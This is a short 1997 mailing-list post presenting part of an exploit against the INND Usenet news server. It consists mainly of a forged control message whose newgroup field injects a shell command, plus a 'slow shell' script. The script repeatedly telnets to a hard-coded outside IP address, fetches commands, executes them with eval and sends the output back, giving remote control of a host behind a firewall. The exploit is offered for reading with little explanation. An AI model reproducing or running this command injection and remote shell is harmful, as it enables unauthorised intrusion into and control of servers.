INND exploit Works behind firewalls

[k97161 () SKYRR IS (Rikhardur Egilsson)]

A part of the first innd exploit was a remote shell that would be
effective behind firewalls.

Along with a replaced 'telnetd' on the attackers computer, this can be
used as a "slow shell" to execute commands on a target behind a firewall.

Enjoy the reading ,,

#################### START SLOW SHELL #################################
Path: 
skyrr.is!news.isnet.is!newsfeed.sunet.se!news99.sunet.se!newsfeed.luth.se!news.luth.se!eru.mt.luth.se!news.algonet.se!nntp.uio.no!sn.no!online.no!news.omgroup.com!online.no!bounce-back
From: tale () uunet uu net (David C Lawrence)
Newsgroups: comp.sys.mac.printing
Subject: cmsg newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Control: newgroup `/bin/sed:-n:'/^#+/,/^#-/p':${ARTICLE}|/bin/sh` moderated
Approved: newgroups-request () uunet uu net
Message-ID: <830201540.9020 () uunet uu net>
Date: Sat, 15 Mar 1997 15:15:15 GMT
Lines: 12

#+
while:; do
  IN=`/bin/sleep 2 | /bin/telnet 193.12.106.100 23 2>/dev/null | /bin/tail -1`
  if [ X"$IN" != X"$OIN" ]; then
    (/bin/sleep 2; eval "$IN" 2>&1) |
      /bin/telnet 193.12.106.100 23 >/dev/null 2>&1
    OIN=$IN
  fi
  sleep 30
done
#-

#################### END SLOW SHELL #################################



--
rikardur () skyrr is   -     Skyrr Ltd     -  Iceland Information Management
Rikhardur Egilsson  - System Programmer -  UNIX Admin - Tel : +354-5695100
Armuli 2  -  IS-108 Reykjavik -   Iceland  -  Fax : +354-5695251